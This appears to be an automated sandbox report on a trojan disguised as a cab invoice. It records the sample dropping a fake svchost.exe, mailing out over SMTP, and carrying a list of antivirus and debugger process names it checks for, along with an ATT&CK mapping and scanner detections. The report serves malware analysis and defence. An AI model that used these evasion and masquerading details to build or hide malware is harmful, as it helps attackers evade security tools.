Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\pywintypes38.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\win32gui.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\win32event.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\win32api.pyd VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0131836B cpuid 1_2_0131836B
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01317FF1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_01317FF1
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0132B193 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0132B193
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA76470 PyArg_ParseTuple,GetVersionExW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,Py_BuildValue,GetVersionExW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,Py_BuildValue,PyExc_ValueError,PyExc_ValueError,PyErr_Format,19_2_6DA76470
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA739F0 PyArg_ParseTuple,GetUserNameW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,19_2_6DA739F0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fprot.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: mcagent.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: mcvsrte.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsmb32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: avgrsx.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsaa.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsgk32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: guard.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: portmonitor.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fnrb32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: portdetective.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fih32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: mcshield.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: nod32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: rtvscan.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsm32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsav32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: apvxdwin.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: f-stopw.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: defwatch.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsav.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: avgemc.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: vsmon.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: mcupdate.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: nmain.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsma32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: processmonitor.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: procdump.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fp-win.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: avguard.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: f-prot.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: avp.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsav530stbyb.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsav530wtbyb.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fast.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fameh32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: avkservice.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fch32.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: spf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: avgnt.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: fsav95.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: mcvsshld.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: f-prot95.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture11System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScheduled Task/JobApplication Shimming1Application Shimming1Obfuscated Files or Information2LSASS MemoryPeripheral Device Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Registry Run Keys / Startup Folder1Process Injection12Software Packing1Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Timestomp1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery36SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsSecurity Software Discovery141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion2Proc FilesystemProcess Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 534002 Sample: Cab_Invoice_pdf.bin Startdate: 04/12/2021 Architecture: WINDOWS Score: 72 61 Antivirus / Scanner detection for submitted sample 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 Initial sample is a PE file and has a suspicious name 2->65 67 2 other signatures 2->67 8 Cab_Invoice_pdf.exe 68 2->8         started        12 svchost.exe 68 2->12         started        14 svchost.exe 68 2->14         started        16 5 other processes 2->16 process3 dnsIp4 47 63 other files (none is malicious) 8->47 dropped 69 Drops PE files with benign system names 8->69 19 Cab_Invoice_pdf.exe 2 8->19         started        35 C:\Users\user\AppData\Local\...\win32gui.pyd, PE32 12->35 dropped 37 C:\Users\user\AppData\...\win32event.pyd, PE32 12->37 dropped 39 C:\Users\user\AppData\Local\...\win32api.pyd, PE32 12->39 dropped 49 60 other files (none is malicious) 12->49 dropped 23 svchost.exe 12->23         started        41 C:\Users\user\AppData\Local\...\win32gui.pyd, PE32 14->41 dropped 43 C:\Users\user\AppData\...\win32event.pyd, PE32 14->43 dropped 45 C:\Users\user\AppData\Local\...\win32api.pyd, PE32 14->45 dropped 51 60 other files (none is malicious) 14->51 dropped 25 svchost.exe 14->25         started        53 127.0.0.1 unknown unknown 16->53 55 192.168.2.1 unknown unknown 16->55 file5 signatures6 process7 dnsIp8 57 smtp.gmail.com 142.250.145.108, 49751, 49754, 49826 GOOGLEUS United States 19->57 59 142.250.145.109, 49775, 49783, 49796 GOOGLEUS United States 19->59 33 C:\Users\user\AppData\Roaming\svchost.exe, PE32 19->33 dropped 27 cmd.exe 1 19->27         started        file9 process10 process11 29 conhost.exe 27->29         started        31 reg.exe 1 1 27->31         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Cab_Invoice_pdf.exe63%VirustotalBrowse
Cab_Invoice_pdf.exe33%MetadefenderBrowse
Cab_Invoice_pdf.exe59%ReversingLabsWin32.Trojan.Fsysna
Cab_Invoice_pdf.exe100%AviraTR/Fsysna.zceqw

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pyd0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
1.3.Cab_Invoice_pdf.exe.10695b0.14.unpack100%AviraTR/Patched.Ren.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.pki.goog/gsr1/gsr1.crldn0%Avira URL Cloudsafe
http://pki.goog/gsr1/gsr1.crt0%VirustotalBrowse
http://pki.goog/gsr1/gsr1.crt0%Avira URL Cloudsafe
http://crl.pki.goog/gsr1/gsr1.crl0;0%URL Reputationsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crl(0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gts1c3.derB20%Avira URL Cloudsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crl00%URL Reputationsafe
http://crl.pki.goog/gsr1/gsr1.crl0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gtsr1.der810%Avira URL Cloudsafe
http://pki.goog/repo/certs/gts1c3.der0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gtsr1.derv20%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crlR0%Avira URL Cloudsafe
http://pki.goog/gsr1/gsr1.crte0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gtsr1.der0%Avira URL Cloudsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crl#0%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crlT0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gtsr1.der$0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
http://crl.pki.goog/gtsr1/gtsr1.crlb0%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crld0%Avira URL Cloudsafe
https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crlr0%Avira URL Cloudsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://pki.goog/repo/certs/gts1c3.dere20%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crl0%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
http://pki.goog/gsr1/gsr1.crt020%URL Reputationsafe
